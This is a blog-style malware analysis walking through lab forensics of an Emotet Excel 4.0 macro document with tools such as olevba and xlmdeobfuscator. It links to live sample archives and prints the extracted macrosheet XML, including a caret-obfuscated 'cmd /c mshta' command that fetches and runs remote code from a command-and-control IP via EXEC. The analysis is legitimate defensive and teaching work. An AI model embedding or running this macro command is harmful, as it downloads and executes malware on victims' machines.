Malicious Document Analysis: Emotet Case I

Baris Dincer
8 min readJun 27, 2024

--

In this article, we will conduct operational research on Emotet and analyze its operational capabilities as malware. All these forensic examinations and artifacts analyzes will be carried out in the laboratory environment with a real document created for Emotet.

Emotet is a sophisticated and modular banking Trojan that primarily functions as a downloader or dropper of other banking Trojans. Emotet typically spreads through malicious email attachments or links in phishing emails. These emails often use social engineering tactics to trick recipients into opening the attachments or clicking the links.

We will consider four different document types for this research: xlsm.bin, pcap, html, PNG and bin file, all of which are evidence for Emotet activities. These real files in the lab environment is real malicious files created for Emotet’s malicious activities.

You can obtain the malicious document from this source: https://tria.ge/samples/211216-2gvncachh8/sample.zip

Or you can browse: https://github.com/jstrosch/malware-samples/blob/master/maldocs/emotet/2021/December/sample_artifacts.zip

Please remember to perform your analyzes through virtual environments for security reasons.

Now let’s start analyzing this case one by one.

Let’s start by importing the documents into our secure virtual environment.

output

The first detail that catches your eye is that, as in every case, these files have hash values ​​so that they can be analyzed by the community: d67193e7b4806640105a117a020ab6b0

Although this may seem similar to the MD5 format at first glance, we need to confirm it.

output

Yes, the hash value we have belongs to the MD family.

Determine the type and characteristics of the file.

output

The file we have belongs to the 2007+ version of MS Excel.

Now let’s see if there are any potential exploits identified for this version. You can use this link: https://www.exploit-db.com/search?q=Excel+2007

output

You should pay attention to this detail, some malicious office files can also take advantage of the vulnerabilities in the systems in which they were created to infiltrate the existing system. Vulnerabilities mostly dominated by the overflow methodology have been reported. Maybe this malicious document we have may have benefited from these vulnerabilities. Note this.

We need to find out whether this file we have is encrypted or not: msoffcrypto-tool -t -v d67193e7b4806640105a117a020ab6b0.xlsm.bin

output

It is not encrypted. It is a good point for us. Otherwise, the research we would do on this file would be more tiring. If you encounter such a situation, research and use the msoffcrypto-crack tool.

Let’s get some more detailed information about the document, we will use exiftool for this: exiftool -a -u -g1 d67193e7b4806640105a117a020ab6b0.xlsm.bin

  • -a : Allow duplicate tags.
  • -u : Display unknown tags.
  • -g1 : Organize output by tag groups.
output
output
output
output
output
output
output

As you can see, there is a long printout with details.

It will be beneficial for you to examine some important details below:

  • File Name: d67193e7b4806640105a117a020ab6b0.xlsm.bin
  • File Size: 32 kB
  • File Modification Date/Time: 2021:12:18 21:38:48–05:00
  • File Permissions: -rw-rw-rw-
  • File Type: DOCX (despite the .xlsm.bin extension)
  • File Type Extension: docx
  • MIME Type: application/vnd.openxmlformats-officedocument.wordprocessingml.document
  • Creator: xXx
  • Last Modified By: xXx
  • Create Date: 2021:12:07 22:55:30Z
  • Modify Date: 2021:12:08 21:21:56Z
  • Application: Microsoft Excel
  • Document Security: None
  • App Version: 16.0300

Contained Files:

  • [Content_Types].xml
  • _rels/.rels
  • xl/workbook.xml
  • xl/_rels/workbook.xml.rels
  • xl/macrosheets/sheet1.xml
  • xl/worksheets/sheet1.xml
  • xl/worksheets/sheet2.xml
  • xl/worksheets/sheet3.xml
  • xl/theme/theme1.xml
  • xl/styles.xml
  • xl/drawings/drawing1.xml
  • xl/media/image1.png
  • xl/macrosheets/_rels/sheet1.xml.rels
  • xl/worksheets/_rels/sheet3.xml.rels
  • xl/drawings/_rels/drawing1.xml.rels
  • xl/printerSettings/printerSettings1.bin
  • docProps/core.xml
  • docProps/app.xml

We will refer back to these contained files.

We need to see how this MD value is signed by the community: malwoverview.py -b 1 -B d67193e7b4806640105a117a020ab6b0

output
output
  • SHA-256: 60b238f32cb7814cf644f6b8d9d6d6576462b0b5ef10c03d608181ac88fe57f6
  • SHA-1: fdf3b9a1c83e68cc0dd69c80015822a044cbdc5a
  • MD5: d67193e7b4806640105a117a020ab6b0
  • First Seen: 2021–12–09 16:44:43
  • File Name: Data_01516.xlsm
  • File Size: 31,523 bytes
  • File Type: .xlsm
  • MIME Type: application/vnd.openxmlformats-officedocument.spreadsheetml.sheet

Suspicious behaviors including:

  • Enumerating system info and physical storage devices
  • Modifying Internet Explorer settings
  • Creating hidden windows and synchronization primitives
  • Sending HTTP GET requests

As you immediately noticed, the document we have acts as a trigger. When this document is triggered, a connection request is created and the malicious file is transferred from another source to the machine.

This is fruitful evidence for us. It follows that we need to analyze the network logs or network entries of a machine damaged by this attack. This is why we have the pcap file.

It is strongly recommended that you review the sandbox links below:

output

Here you can clearly see the features of this malicious file, the mechanisms it actively uses, and its general purpose.

output
output

That’s why using communities and online sandboxes is so important. We now have a lot of evidence and many details to investigate.

Let’s look at some other details: olevba -a d67193e7b4806640105a117a020ab6b0.xlsm.bin

output

The output from olevba indicates the presence of an Excel 4.0 macro (XLM) with suspicious characteristics as we guess. The file contains an Excel 4.0 macro (XLM), which is a type of macro commonly used by malware authors, including those behind Emotet, to evade detection.

  • EXEC: This keyword suggests that the macro may run an executable file or a system command, which is a common tactic used by malicious macros to download or execute payloads.
  • IPv4 Address: The presence of 87[.]251[.]85[.]100 (DO NOT CONNECT OR CLICK) indicates a hardcoded IP address, possibly for Command and Control (C2) communication.

We need to extract the macro and analyze its content. Since olevba has already identified the stream containing the macro (xlm_macro.txt), we can use tools like xlmdeobfuscator to deobfuscate and inspect the macro code: xlmdeobfuscator -f d67193e7b4806640105a117a020ab6b0.xlsm.bin

output

IOC is here now! You also saw the command in EXEC and a .html file.

Now save it: xlmdeobfuscator — file d67193e7b4806640105a117a020ab6b0.xlsm.bin — export-json /home/remnux/Desktop/malfiles_documents/emotet_case/xlsm_json_result.json

output
output

Let’s inspect that IOC: 87[.]251[.]85[.]100 (DO NOT CONNECT OR CLICK)

output

It has been identified as malware & malicious by some vendors.

Now use oleid d67193e7b4806640105a117a020ab6b0.xlsm.bin

output

As you can see, we have learned that the activities of the file in our hands have malicious reasons in many ways.

Now try: oledump.py d67193e7b4806640105a117a020ab6b0.xlsm.bin

output

Ops… It appears that the .xlsm file is an OpenXML format, which is a ZIP container rather than an OLE file. For OpenXML formats, we need to extract the contents and look for the macros within the extracted files.

We can parse the content with a different method: binwalk --dd=’.*’ d67193e7b4806640105a117a020ab6b0.xlsm.bin

output

We just use unzip to extract: unzip d67193e7b4806640105a117a020ab6b0.xlsm.bin

output

Now we have this in our file location.

output

Open the relevant .xml files and look for macro code. You can use grep to search for suspicious commands or keywords: grep -i -r “<.*>” .

output

It is quiet long… But useful. Now use grep -r “EXEC”

output
<xm:macrosheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main"
xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main"
xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships"
xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006"
mc:Ignorable="x14ac xr xr2 xr3 xr6"
xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac"
xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision"
xmlns:xr2="http://schemas.microsoft.com/office/spreadsheetml/2015/revision2"
xmlns:xr3="http://schemas.microsoft.com/office/spreadsheetml/2016/revision3"
xmlns:xr6="http://schemas.microsoft.com/office/spreadsheetml/2016/revision6"
xr6:uid="{83FE0663-A87E-40BB-8A6A-64B1D661DFF8}">
<dimension ref="J28:J51"/>
<sheetViews>
<sheetView showFormulas="1" workbookViewId="0">
<selection activeCell="A9" sqref="A9"/>
</sheetView>
</sheetViews>
<sheetFormatPr defaultRowHeight="15" x14ac:dyDescent="0.25"/>
<cols>
<col min="1" max="9" width="9.140625" style="1"/>
<col min="10" max="10" width="31.5703125" style="1" bestFit="1" customWidth="1"/>
<col min="11" max="16384" width="9.140625" style="1"/>
</cols>
<sheetData>
<row r="28" spans="10:10" x14ac:dyDescent="0.25">
<c r="J28" s="5" t="b">
<f bx="1">SSDGO="cmd /c m^sh^t^a h^tt^p^:/^/87.251.85.100/PP/pp.html"</f>
<v>1</v>
</c>
</row>
<row r="39" spans="10:10" x14ac:dyDescent="0.25">
<c r="J39" s="5">
<f>EXEC(SSDGO)</f>
<v>33</v>
</c>
</row>
<row r="51" spans="10:10" x14ac:dyDescent="0.25">
<c r="J51" s="5" t="b">
<f>HALT()</f>
<v>1</v>
</c>
</row>
</sheetData>
<pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/>
<pageSetup paperSize="9" orientation="portrait" r:id="rId1"/>
</xm:macrosheet>
  • Row 28: Defines a formula SSDGO="cmd /c m^sh^t^a h^tt^p^:/^/87.251.85.100/PP/pp.html" with a value of 1.
  • Row 39: Executes the EXEC function with the argument SSDGO.
  • Row 51: Halts the execution with the HALT function.

EXEC Function: This function typically executes whatever command or macro variable is passed to it, which in this case is SSDGO.

HALT Function: Used to stop further execution, potentially to evade detection or to prevent further actions once the intended task is complete.

The use of cmd /c suggests an attempt to execute a command. In this case, it tries to fetch content from http[:][//]87[.]251[.]85[.]100[/]PP[/]pp.html. (DO NOT BROWSE) This could be a part of a command-and-control (C2) communication or downloading additional payloads.

Specifically, in the macro snippet from sheet1.xml, SSDGO is assigned a value that includes a command to execute via cmd /c:

<c r="J28" s="5" t="b"><f bx="1">SSDGO="cmd /c m^sh^t^a h^tt^p^:/^/87.251.85.100/PP/pp.html"</f><v>1</v></c>
  • cmd /c: This is the Windows command to execute a command and then terminate.
  • m^sh^t^a: This appears to be obfuscated characters, likely intended to avoid straightforward detection by automated systems.

We have this .html file.

output

Let’s take a quick look at the content.

output
output
output
output

The output may be long. It is recommended that you take a look at the details here.

We need to have a look at it by using xxd: xxd d67193e7b4806640105a117a020ab6b0.xlsm.bin

output
output
output
output

Use it for target macro sheet: xxd sheet1.xml

output

You see IOC here.

Don’t give up on hacking.

Code for good.

^-^

--

--